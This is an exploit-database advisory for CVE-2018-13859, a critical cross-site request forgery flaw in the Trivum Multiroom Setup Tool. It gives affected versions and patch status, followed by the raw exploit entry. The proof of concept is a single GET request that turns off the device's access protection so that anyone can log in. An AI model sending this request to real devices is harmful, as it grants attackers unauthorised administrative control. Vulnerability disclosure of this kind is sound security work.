Trivum Multiroom Setup Tool 8.76 - Corss-Site Request Forgery (Admin Bypass)

vendor:

Multiroom Setup Tool

by:

vulnc0d3c

9.8

CVSS

CRITICAL

Cross-Site Request Forgery (Admin Bypass)

352

CWE

Product Name: Multiroom Setup Tool

Affected Version From: V8.76

Affected Version To: V9.34 build 13381 - 12.07.18

Patch Exists: YES

Related CWE: CVE-2018-13859

CPE: //a:trivum_multiroom_setup_tool

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: V8.76 - SNR 8604.26 - C4 Professional

2018

Trivum Multiroom Setup Tool 8.76 – Corss-Site Request Forgery (Admin Bypass)

MusicCenter / Trivum Multiroom Setup Tool V8.76 - SNR 8604.26 - C4 Professional before V9.34 build 13381 - 12.07.18, allow unauthorized remote attackers to reset the authentication via "/xml/system/setAttribute.xml" URL, using GET request to the end-point "?id=0&attr=protectAccess&newValue=0" (successful attack will allow attackers to login without authorization).

Mitigation:

Ensure that the application is not vulnerable to Cross-Site Request Forgery (CSRF) attacks.

Source

Exploit-DB raw data:

# Exploit Title: Trivum Multiroom Setup Tool 8.76 - Corss-Site Request Forgery (Admin Bypass)
# Date: 2018-07-25
# Software Link: [https://world.trivum-shop.de](https://world.trivum-shop.de/)
# https://world.trivum-shop.de/# Version: < 9.34 build 13381 - 12.07.18
# Category: hardware, webapps
# Tested on: V8.76 - SNR 8604.26 - C4 Professional
# Exploit Author: vulnc0d3c
# CVE: CVE-2018-13859

# 1. Description
# MusicCenter / Trivum Multiroom Setup Tool V8.76 - SNR 8604.26 - C4 Professional before V9.34 build 13381 - 12.07.18,
# allow unauthorized remote attackers to reset the authentication via "/xml/system/setAttribute.xml" URL, using GET request
# to the end-point "?id=0&attr=protectAccess&newValue=0"
# (successful attack will allow attackers to login without authorization).

# 2. Proof of Concept
# GET Request

http://target/xml/system/setAttribute.xml?id=0&attr=protectAccess&newValue=0